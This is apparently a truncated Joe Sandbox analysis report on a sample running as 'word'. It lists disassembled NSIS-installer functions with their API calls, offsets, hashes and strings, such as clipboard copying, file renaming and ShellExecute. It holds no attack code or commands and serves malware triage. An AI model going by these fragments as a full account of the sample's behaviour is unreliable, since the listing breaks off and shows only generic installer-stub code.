Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: e22ae86df826857fbde9b8311652889abe6f1c16a65206db964d77a6b66f7b7e
Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
Opcode Fuzzy Hash: e22ae86df826857fbde9b8311652889abe6f1c16a65206db964d77a6b66f7b7e
Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E

Function 004062CB Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45

Function 00154CE4 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fed19f2e2018fd1f55632966c9ba1bd036e2338c28c715791c20738bdb3892
Instruction ID: 077b52a434e7977b05678916e600eceff7d5c0c0078fa7b30fefe3fe5bc4d52b
Opcode Fuzzy Hash: 68fed19f2e2018fd1f55632966c9ba1bd036e2338c28c715791c20738bdb3892
Instruction Fuzzy Hash: 46916A74E01208CFCB04DFA8C488AEDBBF1BB4A315F1591A9E819BB365D734A985CF54

Function 0015255C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc87560c9fdbc07ff8d6977ea38dece8ffeef301f1d4c899e7bf2837ddab66e7
Instruction ID: 2a9fcaa37a0bc76c9f35e32fb9089e66785859dd4a2959f256cd5cc43f7ca8ad
Opcode Fuzzy Hash: cc87560c9fdbc07ff8d6977ea38dece8ffeef301f1d4c899e7bf2837ddab66e7
Instruction Fuzzy Hash: C4419BB8D05248EFCB14CFA9D584A9EFBF0BB49310F64842AE819B7310D734A945CF54

Function 00153265 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.5952779533.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_150000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d93e1c4c2864671f96cece02754c96b99178dbc8bdc66a14d04cd689867943
Instruction ID: 4309248dcb801a9ff5d94d8d64688859e971ef99a93147757494e9dcbcbfb6a5
Opcode Fuzzy Hash: a7d93e1c4c2864671f96cece02754c96b99178dbc8bdc66a14d04cd689867943
Instruction Fuzzy Hash: C93189B8D01258EFCB14CFA9E584A9EFBF5BB49310F24942AE819BB310D734A945CF54

Function 0040511A Relevance: 54.3, APIs: 36, Instructions: 280windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040517A
GetDlgItem.USER32(?,000003EE), ref: 00405189
GetClientRect.USER32(?,?), ref: 004051C6
GetSystemMetrics.USER32(00000015), ref: 004051CE
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
ShowWindow.USER32(?,?), ref: 0040526A
GetDlgItem.USER32(?,000003EC), ref: 0040528B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
GetDlgItem.USER32(?,000003F8), ref: 00405198

Part of subcall function 00404021: SendMessageA.USER32(?,?,00000001,00403E52), ref: 0040402F

GetDlgItem.USER32(?,000003EC), ref: 004052DC
CreateThread.KERNEL32(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
CloseHandle.KERNEL32(00000000), ref: 004052F1
ShowWindow.USER32(00000000), ref: 00405314
ShowWindow.USER32(?,?), ref: 0040531B
ShowWindow.USER32(?), ref: 00405361
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
CreatePopupMenu.USER32 ref: 004053A6
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
GetWindowRect.USER32(?,000000FF), ref: 004053DB
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004053F4
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
OpenClipboard.USER32(00000000), ref: 00405440
EmptyClipboard.USER32 ref: 00405446
GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
GlobalLock.KERNEL32(00000000), ref: 00405459
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
GlobalUnlock.KERNEL32(00000000), ref: 00405486
SetClipboardData.USER32(00000001,00000000), ref: 00405491
CloseClipboard.USER32 ref: 00405497

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: fdb75e8004b8a962cc111e39fdc512337dd08274530e00a83830c09f1a41fc8c
Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
Opcode Fuzzy Hash: fdb75e8004b8a962cc111e39fdc512337dd08274530e00a83830c09f1a41fc8c
Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69

Function 00403B19 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
ShowWindow.USER32(?), ref: 00403B72
DestroyWindow.USER32 ref: 00403B86
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
GetDlgItem.USER32(?,?), ref: 00403BC3
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
IsWindowEnabled.USER32(00000000), ref: 00403BDE
GetDlgItem.USER32(?,00000001), ref: 00403C8C
GetDlgItem.USER32(?,00000002), ref: 00403C96
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
GetDlgItem.USER32(?,00000003), ref: 00403DA7
ShowWindow.USER32(00000000,?), ref: 00403DC8
EnableWindow.USER32(?,?), ref: 00403DDA
EnableWindow.USER32(?,?), ref: 00403DF5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
EnableMenuItem.USER32(00000000), ref: 00403E12
SendMessageA.USER32(?,?,00000000,00000001), ref: 00403E2A
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
lstrlenA.KERNEL32(0041FCF8,?,0041FCF8,00422F00), ref: 00403E66
SetWindowTextA.USER32(?,0041FCF8), ref: 00403E75
ShowWindow.USER32(?,0000000A), ref: 00403FA9

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 7a9b3478a056a8be47fe98105da4df115e2d466b78babc3a57200212fb962581
Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
Opcode Fuzzy Hash: 7a9b3478a056a8be47fe98105da4df115e2d466b78babc3a57200212fb962581
Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E

Function 00403787 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

lstrcatA.KERNEL32(0042A000,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,0042A400,77583410,00429000,00000000), ref: 00403802
lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FCF8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCF8,00000000,00000002,0042A400), ref: 00403877
lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
GetFileAttributesA.KERNEL32(004226A0), ref: 00403895
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038DE

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

RegisterClassA.USER32(00422EA0), ref: 0040391B
SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403933
CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
ShowWindow.USER32(00000005,00000000), ref: 0040399E
LoadLibraryA.KERNEL32(RichEd20), ref: 004039AF
LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
RegisterClassA.USER32(00422EA0), ref: 004039E0
DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF

Strings

RichEd32, xrefs: 004039B5
.DEFAULT\Control Panel\International, xrefs: 004037ED
RichEdit, xrefs: 004039D1
.exe, xrefs: 00403884
Control Panel\Desktop\ResourceLocale, xrefs: 004037BB
RichEdit20A, xrefs: 004039C2, 004039C8
_Nb, xrefs: 004038FA, 00403962
RichEd20, xrefs: 004039AA

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-2904746566
Opcode ID: 2c8fcd0ffdc3b56b974025b52fd685b926a410c3d438551c25561f7e8452b5b9
Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
Opcode Fuzzy Hash: 2c8fcd0ffdc3b56b974025b52fd685b926a410c3d438551c25561f7e8452b5b9
Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

Function 00404135 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
GetSysColor.USER32(?), ref: 00404203
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
lstrlenA.KERNEL32(?), ref: 00404224
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
GetDlgItem.USER32(?,0000040A), ref: 004042AA
SendMessageA.USER32(00000000), ref: 004042AD
GetDlgItem.USER32(?,000003E8), ref: 004042D8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
LoadCursorA.USER32(00000000,00007F02), ref: 00404327
SetCursor.USER32(00000000), ref: 00404330
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
LoadCursorA.USER32(00000000,00007F00), ref: 00404350
SetCursor.USER32(00000000), ref: 00404353
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
SendMessageA.USER32(?,00000000,00000000), ref: 00404393

Strings

open, xrefs: 0040433B
N, xrefs: 004042C6

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99

Function 00405A29 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66

Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
wsprintfA.USER32 ref: 00405AA1
GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,?,00421E88,?,?,?,?,?), ref: 00405ADC
GlobalAlloc.KERNEL32(?,0000000A), ref: 00405AEB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
GlobalFree.KERNEL32(00000000), ref: 00405B92
CloseHandle.KERNEL32(00000000), ref: 00405B99

Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Strings

[Rename], xrefs: 00405B0B, 00405B1D
%s=%s, xrefs: 00405A97
NUL, xrefs: 00405A33

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: c8a267702ebf4a0dd0b5cf137004853b7e3688b0ba155f7c40b755ef58841ffd
Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
Opcode Fuzzy Hash: c8a267702ebf4a0dd0b5cf137004853b7e3688b0ba155f7c40b755ef58841ffd
Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 0040442A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404479
SetWindowTextA.USER32(00000000,?), ref: 004044A3
SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
CoTaskMemFree.OLE32(00000000), ref: 0040455F
lstrcmpiA.KERNEL32(004226A0,0041FCF8), ref: 00404591
lstrcatA.KERNEL32(?,004226A0), ref: 0040459D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF

Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031EF,0042A400,77583410,004033C9), ref: 00405FD6

GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE

Strings

A, xrefs: 0040454D

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: 49aa2d54947e3dfcb73cf5b498707616a801c81160403307e0dcdfcf6ee43659
Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
Opcode Fuzzy Hash: 49aa2d54947e3dfcb73cf5b498707616a801c81160403307e0dcdfcf6ee43659
Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69

Function 00402C79 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402C8D
GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CA9

Part of subcall function 00405982: GetFileAttributesA.KERNEL32(00000003,00402CBC,0042AC00,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CF2
GlobalAlloc.KERNEL32(?,00409130), ref: 00402E39

Strings

soft, xrefs: 00402D69
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
Error launching installer, xrefs: 00402CC9
Null, xrefs: 00402D72
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
Inst, xrefs: 00402D60

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3016655952
Opcode ID: 032b80d595d8a3652c003b9594642cc32fc66d4423432ee22d3093834af6a84a
Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
Opcode Fuzzy Hash: 032b80d595d8a3652c003b9594642cc32fc66d4423432ee22d3093834af6a84a
Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD

Function 00405D13 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405DC4
GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E3F
GetWindowsDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E52
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00405E9C
CoTaskMemFree.OLE32(00000000), ref: 00405EA7
lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
lstrlenA.KERNEL32(004226A0,?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405F1B

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3

Memory Dump Source

Source File: 00000015.00000002.5953312773.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.5953241468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953386017.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953458296.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_word.jbxd

Similarity

